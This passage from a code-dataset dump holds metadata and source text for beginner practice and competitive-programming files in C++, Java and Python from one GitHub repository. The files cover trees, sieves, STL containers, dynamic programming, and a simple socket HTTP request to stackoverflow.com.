temp.data):\n if temp.right == None:\n temp.right = node\n break\n else:\n temp = temp.right\n \ndef inorder(node):\n if(node):\n \n if node.left:\n inorder(node.left)\n \n print(node.data, end=\" \")\n \n if node.right :\n inorder(node.right)\n \n\n\nif __name__ == '__main__':\n \n l = [1, 2, 5, 7, 8, 3]\n root = Node(l[0])\n for i in range(1, len(l)):\n addNode(root, l[i])\n \n inorder(root)" }, { "alpha_fraction": 0.32972973585128784, "alphanum_fraction": 0.3581081032752991, "avg_line_length": 10.059701919555664, "blob_id": "36c9750d6ce720376741693750f4064fa9531ce1", "content_id": "71bd88fa9f3e0ffea2b5dab2023397da2980ca61", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 740, "license_type": "permissive", "max_line_length": 35, "num_lines": 67, "path": "/C++/ZCO14001.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\t ios_base::sync_with_stdio(false);\n cin.tie(NULL);\n\tint n,i;\n\tlong h;\n\tcin >> n;\n\tcin >> h;\n\tvector< int >a(n);\n\tvector < int >b();\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> a[i];\n\t}\n\tint w = 1;\n\ti = 0;\n\tint up = 0, t = 0;\n\twhile(w!=0 && t ==0)\n\t{\n\t\tcin >> w;\n\t\tswitch(w)\n\t\t{\n\t\t\tcase 0:\n\t\t\t\tt = 1;\n\t\t\t\tbreak;\n\t\t\t\t\n\t\t\tcase 1:\n\t\t\t\tif(i != 0)\n\t\t\t\t{\n\t\t\t\t\t--i;\t\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t\n\t\t\tcase 2:\n\t\t\t\tif(i != n-1)\n\t\t\t\t{\n\t\t\t\t\ti++;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t\t\n\t\t\tcase 3:\n\t\t\t\tif(up == 0 && a[i]!=0)\n\t\t\t\t{\n\t\t\t\t\tup = 1;\n\t\t\t\t\t--a[i];\t\t\t\t\t\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\t\t\n\t\t\tcase 4:\n\t\t\t\tif(up == 1 && a[i] < h)\n\t\t\t\t{\n\t\t\t\t\t++a[i];\n\t\t\t\t\tup = 0;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t}\n\t\t\n\t}\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcout << a[i] << \" \";\n\t}\n\t\n}" }, { "alpha_fraction": 0.3805811405181885, "alphanum_fraction": 0.4167257249355316, "avg_line_length": 12.177570343017578, "blob_id": "cc5c8c5e59101906aae46fcc617050c146f6e055", "content_id": "9628e65761261d2b9074679ab2f0fd280d1e0360", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1411, "license_type": "permissive", "max_line_length": 38, "num_lines": 107, "path": "/April Long_2020/Unit GCD - version 2.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nvoid prime(int n, vector<bool> &check)\n{\n\tlong long i, j;\n\tcheck[0] = false;\n\tcheck[1] = false;\n\tfor(i=2;i*i<=n;i++)\n\t{\n\t\tif(i > n/2)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tif(check[i] == true)\n\t\t{\n\t\t\tfor(j=i*i; j <= n;j = j + i)\n\t\t\t{\n\t\t\t\tcheck[j] = false;\n\t\t\t}\t\n\t\t}\n\t}\n\t\n\tfor(i=i;i<=n;i++)\n\t{\n\t\tif(check[i] == true)\n\t\t{\n\t\t\tfor(j=2; i*j <= n;j++)\n\t\t\t{\n\t\t\t\tcheck[i*j] = false;\n\t\t\t}\t\n\t\t}\n\t}\t\n}\n\nint main()\n{\n\tint t, n ,i ,j;\n\tcin >> t;\n\tvector<bool> check(1000001, true);\n\tprime(1000001, check);\n\n\t\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tvector<vector<int>> ans(1000001);\n\t\tint days = 1;\n\t\tvector<bool> rest = check;\n\t\t\n\t\tans[0].push_back(1);\n\t\tfor(i=0;i <= n; i++)\n\t\t{\n\t\t\tif(rest[i] == true)\n\t\t\t{\n\t\t\t\tans[0].push_back(i);\t\n\t\t\t}\n\t\t}\n\t\t\n\t\tfor(i=2;2*i<=n;i++)\n\t\t{\n\t\t\tans[days].push_back(2*i);\n\t\t\trest[2*i] = true;\t\t\t\n\t\t\tdays++;\n\t\t}\n\t\tcout << days << \"\\n\";\t\t\t\n\t\t\n\t\tint temp, k = 1;\n\t\tbool flag = true;\n\t\tfor(i=9;i<=n;i++)\n\t\t{\n\t\t\tif(rest[i] == 0)\n\t\t\t{\n\t\t\t\tflag = true;\n\t\t\t\twhile(flag)\n\t\t\t\t{\n\t\t\t\t\tif(__gcd(ans[k][0], i) != 1)\n\t\t\t\t\t{\n\t\t\t\t\t\t++k;\n\t\t\t\t\t}\n\t\t\t\t\telse\t\n\t\t\t\t\t{\n\t\t\t\t\t\tans[k].push_back(i);\n\t\t\t\t\t\t++k;\n\t\t\t\t\t\tflag = false;\t\t\t\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t}\n\t\tfor(i=0;i<1000001;i++)\n\t\t{\n\t\t\tif(ans[i].size() == 0)\n\t\t\t{\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tcout << ans[i].size() << \" \";\n\t\t\tfor(j=0;j<ans[i].size();j++)\n\t\t\t{\n\t\t\t\tcout << ans[i][j] << \" \";\n\t\t\t}\n\t\t\tcout << \"\\n\";\n\t\t}\n//\t\tcout << \"ran succ\\n\";\n\t\t}\n\t\treturn 0;\n\t}\t\n" }, { "alpha_fraction": 0.41203704476356506, "alphanum_fraction": 0.46990740299224854, "avg_line_length": 13.366666793823242, "blob_id": "a3cf6f913a3de97704eea5b0ab0c8edf9773e1ad", "content_id": "6456ba35910afa8d2211b5b99d7bc0b37e7288b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 432, "license_type": "permissive", "max_line_length": 45, "num_lines": 30, "path": "/April Long_2020/Sell All the Cars.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t, n, i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tvector< long >vec(n);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> vec[i];\n\t\t}\n\t\tsort(vec.begin(), vec.end());\n\t\treverse(vec.begin(), vec.end());\n\t\tlong long ans = 0;\n\t\tint temp = 0;\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tif(vec[i] - i > 0)\n\t\t\t{\n\t\t\t\tans = ans + ((vec[i] - i) % 1000000007);\t\n\t\t\t}\n\t\t}\n\t\tcout << ans % 1000000007 << \"\\n\";\n\t}\n\n}\n\n" }, { "alpha_fraction": 0.5826330780982971, "alphanum_fraction": 0.6610644459724426, "avg_line_length": 21.1875, "blob_id": "4e2853e9c07681d11f2813e10f3aa13448ccadc7", "content_id": "816856c4918bacfc36ff121aef0bc6bfb986867c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "permissive", "max_line_length": 56, "num_lines": 16, "path": "/python/Linkedlist/stack.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 15 15:48:49 2019\n\n@author: teja\n\"\"\"\n\nimport socket\nrequest = b\"GET / HTTP/1.1\\nHost: stackoverflow.com\\n\\n\"\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((\"stackoverflow.com\", 80))\ns.send(request)\nresult = s.recv(10000)\nwhile (len(result) > 0):\n print(result)\n result = s.recv(10000) " }, { "alpha_fraction": 0.5057914853096008, "alphanum_fraction": 0.5173745155334473, "avg_line_length": 15.1875, "blob_id": "832f251c9398bf8bb0ffe6070ad2c964e3154e8d", "content_id": "780d807dc48085ea6face435ede72ed1db2464b6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 259, "license_type": "permissive", "max_line_length": 44, "num_lines": 16, "path": "/C++/set/set.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\nint main()\n{\n\tset < int > a;\n\ta.insert(2);\n\ta.insert(3);\n\tset< int > :: iterator itr;\n\tint i;\n\tint pos = a.find(3);\n\tcout << pos <<\"\\n\";\n\tfor(itr = a.begin(); itr != a.end(); itr++)\n\t{\n\t\tcout << *itr << \"\\n\";\n\t}\n}\n" }, { "alpha_fraction": 0.5051546096801758, "alphanum_fraction": 0.5206185579299927, "avg_line_length": 12.857142448425293, "blob_id": "208bd894a2f6fa381fe74876b502aef0b2078401", "content_id": "112e93e00b5a5a9b53099a77a0d6639599f3228b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 194, "license_type": "permissive", "max_line_length": 28, "num_lines": 14, "path": "/C++/Unordered set - HashMap/Unordered set.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\n#include<unordered_set>\nusing namespace std;\n\nint main()\n{\n\tunordered_map <int, int> a;\n\ta[3]++;\n\tcout << a[3];\n//\tfor(i=0;i<n;i++)\n//\t{\n//\t\tcout << a[i] << \"\\n\";\n//\t}\n}\n" }, { "alpha_fraction": 0.46724891662597656, "alphanum_fraction": 0.4978165924549103, "avg_line_length": 12.470588684082031, "blob_id": "0d9f979e5d46a78f26bd5439fdb6fbdff0ea1379", "content_id": "026ff42de44bc4e264dd4ea61c5c0ec37c1a0fdb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 229, "license_type": "permissive", "max_line_length": 28, "num_lines": 17, "path": "/C++/Unordered set - HashMap/iteration.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\n#include<unordered_map>\nusing namespace std;\n\nint main()\n{\n\tunordered_map < int,int >a;\n\tfor(int i = 0; i < 10; i++)\n\t{\n\t\ta[i] = a[i] + 1;\n\t}\n\t\n\tfor(int i = 0; i < 10; i++)\n\t{\n\t\tcout << a[i] << \"\\n\";\n\t}\n}\n" }, { "alpha_fraction": 0.40122511982917786, "alphanum_fraction": 0.42879021167755127, "avg_line_length": 12.079999923706055, "blob_id": "52c9400517f6b9534192f4d68ca405a1d4d0e91e", "content_id": "10bc99269ebdf0d28ec287bfd8b67929258d69d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 653, "license_type": "permissive", "max_line_length": 41, "num_lines": 50, "path": "/C++/CHDIGER.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tstring n,res = \"\";\n\t\tint d,i;\n\t\tcin >> n >> d;\n\t\tstring arr = \"0123456789\";\n\t\tint st = 0; \n\t\twhile(true)\n\t\t{\n\t\t\tint minindex = -1;\n\t\t\tint\t minval = d;\n\t\t\tfor(i=st;i<n.length();i++ )\n\t\t\t{\n\t\t\t\tif(n[i] - '0' < minval)\n\t\t\t\t{\n\t\t\t\t\tminval = n[i] - '0';\n\t\t\t\t\tminindex = i;\n\t\t\t\t}\t\n\t\t\t}\n\t\t\tif(minindex == -1)\n\t\t\t{\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tres = res + arr[minval];\n\t\t\t\tst = minindex + 1;\n\t\t\t}\n\t\t}\n\t\t\n\t\tint len = res.length();\n\t\tfor(i=0;i<len;i++)\n\t\t{\n\t\t\tcout << res[i];\n\t\t}\n\t\tfor(i = 0 ; i<(n.length() - len) ; i++)\n\t\t{\n\t\t\tcout << d;\n\t\t}\n\n\t\tcout << \"\\n\";\n\t}\n}" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.5, "avg_line_length": 11.315789222717285, "blob_id": "de1f1612bb54c76ff1af5cf2945907597b468945", "content_id": "bf2c36bc492c05106378ae108e29f55e9f57b6fa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 234, "license_type": "permissive", "max_line_length": 37, "num_lines": 19, "path": "/C++/structure.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nstruct point\n{\n\tint x;\n\tint y;\n};\n\nint main()\n{\n\tpoint p1 = {0, 1};\n\tcout << p1.x << \" \" << p1.y << \"\\n\";\n\t\n\t// Pointer for structure\n\tpoint* p2 = &p1;\n\tcout << p2->x << \" \" << p2->y;\n\t\n}\n" }, { "alpha_fraction": 0.3372780978679657, "alphanum_fraction": 0.36489152908325195, "avg_line_length": 13.941176414489746, "blob_id": "54cc355b263318bba8b21aa5382825b1359fa880", "content_id": "ce63c8ad7ee11ffb565fe5e2e5ebacd46b365957", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 507, "license_type": "permissive", "max_line_length": 68, "num_lines": 34, "path": "/C++/MAXREM.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tlong n;\n\tlong i;\n\tcin >> n;\n\tvector < long > a(n);\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> a[i];\n\t}\n//\tcout << a[n-1] << \"\\n\";\n\tsort(a.begin(),a.end());\n//\tfor(i=0;i<n;i++)\n//\t{\n//\t\tcout << a[i] << \"\\t\";\n//\t}\n\tfor(i=n-1;i>=1;i--)\n\t{\n//\t\tcout << i << \" \" << i-1 << \"\\n\"; \n//\t\tcout << a[i] << \" % \" << a[i-1] << \" = \" << a[i]%a[i-1] << \"\\n\";\n\t\tif(a[i]%a[i-1] != 0)\n\t\t{\n\t\t\tcout << a[i-1];\n\t\t\texit(0);\n\t\t}else if (i==1)\n\t\t{\n\t\t\tcout << a[i] % a[i-1];\n\t\t}\n\t\t\n\t}\n}" }, { "alpha_fraction": 0.38545453548431396, "alphanum_fraction": 0.39818182587623596, "avg_line_length": 11.813953399658203, "blob_id": "f2def6b1376005fb92d328de53d275b364264063", "content_id": "9f54fbbd0e41abe52d7a38543b1df48d4085f49e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 550, "license_type": "permissive", "max_line_length": 48, "num_lines": 43, "path": "/C++/ATTND.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tint n,i,j;\n\t\tcin >> n;\n\t\tvector< string >fname(n);\t\n\t\tvector< string >lname(n);\n\t\tvector< int >a(n,0);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> fname[i];\n\t\t\tcin >> lname[i];\n\t\t}\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\t for(j=i+1;j<n;j++)\n\t\t\t {\n\t\t\t \tif(fname[i] == fname[j])\n\t\t\t \t{\n\t\t\t \t\ta[i] = a[j] = 1;\n\t\t\t\t}\n\t\t\t }\n\t\t}\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tif(a[i] == 1)\n\t\t\t{\n\t\t\t\tcout << fname[i] << \" \" << lname[i] << \"\\n\";\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tcout << fname[i] << \"\\n\";\n\t\t\t}\n\t\t}\n\t}\n\t\n}" }, { "alpha_fraction": 0.5772947072982788, "alphanum_fraction": 0.5869565010070801, "avg_line_length": 16.20833396911621, "blob_id": "d416975af8481c7e36ad538d6a68debe432d2df0", "content_id": "6e937375f43984d14737759eb03e9291846d939a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 414, "license_type": "permissive", "max_line_length": 60, "num_lines": 24, "path": "/Java/FLOW008.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "\nimport java.lang.*;\nimport java.util.*;\nimport java.lang.Math;\nclass example {\n\n\tpublic static void main(String[] args) {\n\t\t// TODO Auto-generated method stub\n\t\tScanner sc = new Scanner(System.in);\n\t\tint t, n;\n\t\tt = sc.nextInt();\n\t\twhile(t--!=0)\n\t\t{\n\t\t\tn = sc.nextInt();\n\t\t\tif(n < 10)\n\t\t\t{\n\t\t\t\tSystem.out.println(\"What an obedient servant you are!\");\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tSystem.out.println(\"-1\");\n\t\t\t}\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.4345238208770752, "alphanum_fraction": 0.4821428656578064, "avg_line_length": 15.75, "blob_id": "5a0ac60365737736a5274e8f23ff7872d43cc8b1", "content_id": "29a64c276ca8f1051cd19b6ca6bb9818783b72b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 336, "license_type": "permissive", "max_line_length": 58, "num_lines": 20, "path": "/C++/StringtoInt-conversions.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tchar s = '9';\n//\tcout << int(s) - '0' << \"\\n\";\n\t\n\tstring str = \"01240000\";\n\tcout << stoi(str);\n\t\n//\tcout << 0%10;\n\t\n\tchar c[3] = {'1', 'c', '8'};\n//\tcout << atoi(c) << \"\\n\"; // atoi is only for char array\n\t\n//\tstr = \"zc\";\n//\tcout << stoi(str) << \"\\n\"; // this throws err\n\t\n}\n\n" }, { "alpha_fraction": 0.46268656849861145, "alphanum_fraction": 0.4726368188858032, "avg_line_length": 12.896552085876465, "blob_id": "82e094bc32c64e9d79ea7de192f5cb16444785c5", "content_id": "1169fbbd117f4e284b6991fc2ace6714d746779f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 402, "license_type": "permissive", "max_line_length": 34, "num_lines": 29, "path": "/C++/ZCO15002.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tios_base::sync_with_stdio(false);\n cin.tie(NULL);\n\tlong k,i,n,count = 0,j;\n\tcin >> n;\n\tcin >> k;\n\tvector < long >a(n);\n\tfor(i=0;i<n;i++)\n\t{\n\t\tcin >> a[i];\n\t}\n\tsort(a.begin(),a.end());\n\tfor(i=0;i<n;i++)\n\t{\n\t\tfor(j=i+1;j<n;j++)\n\t\t{\n\t\t\tif(abs(a[i] - a[j]) >= k)\n\t\t\t{\n\t\t\t\tcount = count + (n-j);\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\tcout << count << \"\\n\";\n}" }, { "alpha_fraction": 0.3775252401828766, "alphanum_fraction": 0.40909090638160706, "avg_line_length": 12.440677642822266, "blob_id": "93d4968404d82c8b3f126a6499274f03d1cacf94", "content_id": "a294b97203adfc046e956da3eba4052b0221e15b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 792, "license_type": "permissive", "max_line_length": 54, "num_lines": 59, "path": "/C++/STRCH.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\nint main()\n{\n\tint t,n;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tlong i,j,first,sec,diff=0,sum=0,size,tot=0,flag = 0;\n\t\tcin >> n;\n\t\tstring s;\n\t\tchar c;\n\t\tcin >> s;\n\t\tcin >> c;\n\t\tsize = s.size();\n\t\ttot = (size*(size+1))/2;\n\t\tfor(i=0;i<size;i++)\n\t\t{\n\t\t\tif(s[i] == c && i==0)\n\t\t\t{\n\t\t\t\tfirst = i;\n\t\t\t\tflag = 1;\n\t\t\t}\n\t\t\telse if(s[i] == c && flag == 0 && i>0)\n\t\t\t{\n\t\t\t\tflag = 1;\n\t\t\t\tfirst = i;\n\t\t\t\tsum+=(i*(i+1))/2;\n\t\t\t}\n\t\t\telse if(s[i] == c && i>0)\n\t\t\t{\n\t\t\t\tsec = i;\n\t\t\t\tdiff = sec - first - 1;\n\t\t\t\tsum+=(diff*(diff+1))/2;\n\t\t\t\tfirst = i;\n\t\t\t\tsec = 0;\n\t\t\t}\n\t\t}\n\t\tif(first != size-1)\n\t\t{\n\t\t\tsec = size - 1;\n\t\t\tdiff = sec - first;\n\t\t\tsum+=(diff*(diff+1))/2;\n\t\t}\n\t\tif(flag == 1)\n\t\t{\n\t\t\tcout << tot - sum << \"\\n\";\n\t\t}\n\t\telse\n\t\t{\n\t\t\tcout << \"0\" << \"\\n\";\n\t\t}\t\n\t}\n\t\n\n\t\n\t\n\t\n}" }, { "alpha_fraction": 0.3947681188583374, "alphanum_fraction": 0.41617122292518616, "avg_line_length": 12.564516067504883, "blob_id": "c4885da87bb885f6ae14f2828a76495fbb33e43b", "content_id": "71505b44311f0c55bb297470af9ad9e316b7d092", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 841, "license_type": "permissive", "max_line_length": 40, "num_lines": 62, "path": "/C++/XOR Engine.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tios_base::sync_with_stdio(false);\n cin.tie(NULL);\n \n int t, n, q, i, p, bits = 0;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tint even = 0, odd = 0;\n\t\tcin >> n;\n\t\tcin >> q;\n\t\tvector< int > val(n);\n\t\tvector< int > xoo(n);\n\t\tvector< int > eveo(n); //0-even, 1-odd\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> val[i];\n\t\t\tbits = __builtin_popcount(val[i]);\n\t\t\tif(bits % 2 == 0)\n\t\t\t{\n\t\t\t\teveo[i] = 0;\n\t\t\t\t++even;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\teveo[i] = 1;\n\t\t\t\t++odd;\n\t\t\t}\n\t\t}\n\t\twhile(q--)\n\t\t{\n\t\t\tint ceven = 0, codd = 0;\n\t\t\tcin >> p;\n\t\t\tbits = __builtin_popcount(p);\n\t\t\tif(bits % 2 == 0)\n\t\t\t{\n\t\t\t\tp = 0;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tp = 1;\n\t\t\t}\n\t\t\t\n\t\t\tif(p == 0)\n\t\t\t{\n\t\t\t\tcodd = odd;\n\t\t\t\tceven = even;\n\t\t\t}\n\t\t\t\n\t\t\tif(p == 1)\n\t\t\t{\n\t\t\t\tceven = odd;\n\t\t\t\tcodd = even;\t\n\t\t\t}\n\t\t\tcout << ceven << \" \" << codd << \"\\n\";\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.5043478012084961, "alphanum_fraction": 0.5260869860649109, "avg_line_length": 9.904762268066406, "blob_id": "7c75da2582df183c65d206cba81bfd45d5ea5e8f", "content_id": "e944324613388123e4637be67510a45c9fc27aa3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 230, "license_type": "permissive", "max_line_length": 26, "num_lines": 21, "path": "/C++/stack/stackWithheader.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<iostream>\n#include<stack>\nusing namespace std;\n\nint main()\n{\n\tstack <int> s;\n\ts.push(2);\n\ts.push(4);\n\ts.push(1);\n\t\n\tint len = s.size();\n\t\n\tfor(int i=0;i<len;i++)\n\t{\n\t\tcout << s.top() << \" \";\n\t\ts.pop();\n\t}\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.5625, "alphanum_fraction": 0.5754310488700867, "avg_line_length": 18.29166603088379, "blob_id": "0a9d7f5f2123e9020bb9cb7a5734f0f1d0ea37bb", "content_id": "255e7fc8f3d4746465fbfc8b6e8f0b637f1c6912", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 464, "license_type": "permissive", "max_line_length": 41, "num_lines": 24, "path": "/Java/FLOW017.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "\nimport java.util.*;\nimport java.lang.Math;\nclass example {\n\n\tpublic static void main(String[] args) {\n\t\t// TODO Auto-generated method stub\n\t\tScanner sc = new Scanner(System.in);\n\t\tint t;\n\t\tt = sc.nextInt();\n\t\twhile(t--!=0)\n\t\t{\n\t\t\tlong[] array = new long[3];\n\t\t\tlong a, b, c, max;\n\t\t\ta = sc.nextLong();\n\t\t\tb = sc.nextLong();\n\t\t\tc = sc.nextLong();\t\n\t\t\tarray[0] = a;\n\t\t\tarray[1] = b;\n\t\t\tarray[2] = c;\n\t\t\tArrays.sort(array);\n\t\t\tSystem.out.println(array[1]);\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.35729846358299255, "alphanum_fraction": 0.3986928164958954, "avg_line_length": 11.929577827453613, "blob_id": "a6f31574b7ac71494a6edceffe1b949df011f994", "content_id": "e6b5a08c64c9f1ca3053647b970ccc8f4978e034", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 918, "license_type": "permissive", "max_line_length": 74, "num_lines": 71, "path": "/C++/DP/mincost.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint mini(int x, int y, int z)\n{\n\tif(x < y)\n\t{\n\t\treturn (x < z)? x : z;\n\t}\n\telse\n\t{\n\t\treturn (y < z)? y : z;\n\t}\n}\n\nint mincost(int a[][3], int m, int n)\n{\n\tint i, j;\n\t\n\tint tc[3][3];\n\t\n\ttc[0][0] = a[0][0];\n\t\n\tfor(i=1;i<=m;i++)\n\t{\n\t\ttc[i][0] = tc[i-1][0] + a[i][0];\n\t}\n\t\n\tfor(j=1;j<=n;j++)\n\t{\n\t\ttc[0][j] = tc[0][j-1] + a[0][j];\n\t}\n\t\n\tfor(i=1;i<=m;i++)\n\t{\n\t\tfor(j=1;j<=n;j++)\n\t\t{\n\t\t\ttc[i][j] = a[i][j] + mini(tc[i-1][j], tc[i][j-1], tc[i-1][j-1]);\n//\t\t\tcout << \"mini = \" << mini(a[i-1][j], a[i][j-1], a[i-1][j-1]) << \"\\n\";\n\t\t}\n\t}\n\t\n//\tcout << \" return \" << tc[m][n];\n\n\tfor(i=0;i<=m;i++)\n\t{\n\t\tfor(j=0;j<=n;j++)\n\t\t{\n\t\t\tcout << tc[i][j] << \"\\t\";\n\t\t}\n\t\tcout << \"\\n\";\n\t}\n\treturn tc[m][n];\n}\n\nint main()\n{\n\tint a[3][3];\n\tint i, j;\n\tfor(i=0;i<3;i++)\n\t{\n\t\tfor(j=0;j<3;j++)\n\t\t{\n\t\t\tcin >> a[i][j];\n\t\t}\n\t}\n//\tcout << \"Done for\";\n\tint ans = mincost(a, 2, 2);\n\tcout << ans;\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.3302919566631317, "alphanum_fraction": 0.36496350169181824, "avg_line_length": 10.680850982666016, "blob_id": "e21b0bc4c9357bb48f7e22a10a98e977d6d7cc49", "content_id": "9380b3b60ad6b21880e93970ba855528b04fd57e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 548, "license_type": "permissive", "max_line_length": 37, "num_lines": 47, "path": "/C++/GMPOW.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tlong t, n ,a;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tlong long sum = 0,i,flag = 1,x,p=0;\n\t\tcin >> a >> n;\n\t\tlong long k = pow(a,n);\n\t\twhile(k > 0)\n\t\t{\n\t\t\tx = k % 10;\n\t\t\tsum += x;\n\t\t\tk = k / 10;\n\t\t}\n\t//\tcout << sum << \"\\n\";\n\t\tif(sum ==1 || sum ==2)\n\t\t{\n\t\t\tcout << 1 << \"\\n\";\n\t\t\tp = 1;\n\t\t}\n\t\tif(p==0)\n\t\t{\n\t\t\tfor(i=2;i<=sqrt(sum);i++)\n\t\t\t{\n\t\t\tif(sum%i == 0)\n\t\t\t{\n\t\t\t\tflag = 0;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\t}\n\t\t\tif(flag == 1)\n\t\t\t{\n\t\t\t\tcout << 1 << \"\\n\";\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tcout << 0 << \"\\n\";\n\t\t\t}\n\t\t}\n\t\t\n\t}\n\t\n}" }, { "alpha_fraction": 0.48880597949028015, "alphanum_fraction": 0.5522388219833374, "avg_line_length": 14.823529243469238, "blob_id": "b12f85bb084c821c61283fb5b9843d03bab8efaf", "content_id": "f5756bbe235dc59fdd1e9133f57b482a089f2d30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 268, "license_type": "permissive", "max_line_length": 35, "num_lines": 17, "path": "/python/HPOJ/Ex-5/3.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 20 15:17:03 2020\n\n@author: 